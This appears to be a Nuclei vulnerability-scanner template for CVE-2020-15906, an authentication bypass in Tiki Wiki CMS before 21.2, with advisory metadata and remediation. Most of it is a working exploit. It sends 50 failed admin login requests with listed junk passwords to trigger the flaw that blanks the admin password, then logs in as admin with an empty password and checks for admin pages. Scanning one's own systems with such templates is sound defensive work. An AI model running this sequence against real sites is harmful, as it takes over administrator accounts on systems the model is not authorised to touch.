id: CVE-2020-15906 info: name: Tiki Wiki CMS GroupWare - Authentication Bypass author: JeonSungHyun[nukunga],gy741,oIfloraIo,nechyo,harksu severity: critical description: | tiki-login.php in Tiki before 21.2 sets the admin password to a blank value after 50 invalid login attempts. impact: | Unauthenticated attackers can trigger 50 failed login attempts to reset the admin password to blank, gaining complete administrative access to the Tiki Wiki CMS and all its content. remediation: | Upgrade to Tiki Wiki CMS version 21.2 or later. reference: - https://packetstormsecurity.com/files/159663/Tiki-Wiki-CMS-Groupware-21.1-Authentication-Bypass.html - https://nvd.nist.gov/vuln/detail/CVE-2020-15906 - https://github.com/Z0fhack/Goby_POC - https://github.com/bakery312/Vulhub-Reproduce - https://github.com/20142995/Goby classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2020-15906 cwe-id: CWE-307 epss-score: 0.85573 epss-percentile: 0.99387 cpe: cpe:2.3:a:tiki:tiki:*:*:*:*:*:*:*:* metadata: vendor: tiki product: tiki shodan-query: title:"Tiki Wiki CMS" fofa-query: title="Tiki Wiki CMS" google-query: intitle:"Tiki Wiki CMS tags: packetstorm,cve,cve2020,tiki,wiki,auth-bypass,vuln http: - raw: - | GET /tiki-login_scr.php HTTP/1.1 Host: {{Hostname}} extractors: - type: regex part: body name: ticket1 internal: true group: 1 regex: - 'class="ticket" name="ticket" value="(.*)"' - raw: - | POST /tiki-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Referer: {{RootURL}}/tiki-login_scr.php ticket={{ticket1}}&user=admin&pass={{attempt}}&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n payloads: attempt: - nkQ0yYzgF5Er - P5UdGflH48W3 - xFq7vKNLmhZp - 8zKtGnh4dW5R - CfXp2VbQz8Er - Lh3K6vPzM9Xn - bG4RxHpY2MdQ - 7zNtKh3WqF5L - Y8rQ2GpLx9Kn - C7KzLmP5X9Vh - v3LdX8GmQ5Kn - W4NzX6PqL3Ft - Q5GhY2VrX7Jk - r9KdL4PhY6Gm - 8XjVq5LhZ2Kr - L5WnQ9KzY8Pr - M2XdL5GrY9Kh - N6YzP8WkL5Xt - G7JqX5VbM2Kp - H4PrX8LkY6Gm - J5LhY2VqX9Kr - 8GrX5NqL2KhY - K4WnY9PzM8Xt - Q2XkL5PrY8Vh - 9JhL4VqX5GrM - N2XdY5PqL9Kh - W4LhY8KzM5Xt - G5JqX2VrY9Kp - H9PrL5XkY2Gm - L8WnX5KzY9Pr - M4XkY2LqV5Gt - N5XdL9PqY8Kr - P8XnL5VrY2Kh - Q4JqX9LhY5Gr - V7LkX5PrY2Gt - L2WnY9KzX8Pr - M9XdL5PqY4Kh - N8LhY2VqX5Gr - Q7XkL5PrY9Gm - X4LhY8WnM5Kp - G2JqL5VrY9Kt - H7PrX8KzY2Gm - J4LhY5VqX9Kr - N9XkY2LqP5Gt - W8LhY5PrX2Kz - G4JqL5XkY9Vr - P5WnY2KzL8Gt - M7XkY9LhP2Gr - Q2JqL5VrY8Kh - 2JqL5VrY8Kh attack: batteringram threads: 50 - raw: - | GET /tiki-login_scr.php HTTP/1.1 Host: {{Hostname}} - | POST /tiki-login.php HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded Referer: {{RootURL}}/tiki-login.php ticket={{ticket2}}&user=admin&pass=&login=&stay_in_ssl_mode_present=y&stay_in_ssl_mode=n extractors: - type: regex part: body_1 name: ticket2 internal: true group: 1 regex: - 'class="ticket" name="ticket" value="(.*)"' - raw: - | GET /tiki-index.php HTTP/1.1 Host: {{Hostname}} matchers-condition: or matchers: - type: word part: body words: - "System Menu" - "Home" - "Search" - "Wiki" - "File Galleries" - "Settings" condition: and - type: word words: - "Show on admin log-in" - "Tiki Setup" condition: and # digest: 4a0a0047304502210097531dfcb1131f7ccb459c2abb9aca9c16d4f1404c9941c1ab87529364232f6902204f4ef0872b324a77f9f97032d147e33d509234f03234e3993433cd2f727bd75d:922c64590222798bb761d5b6d8e72950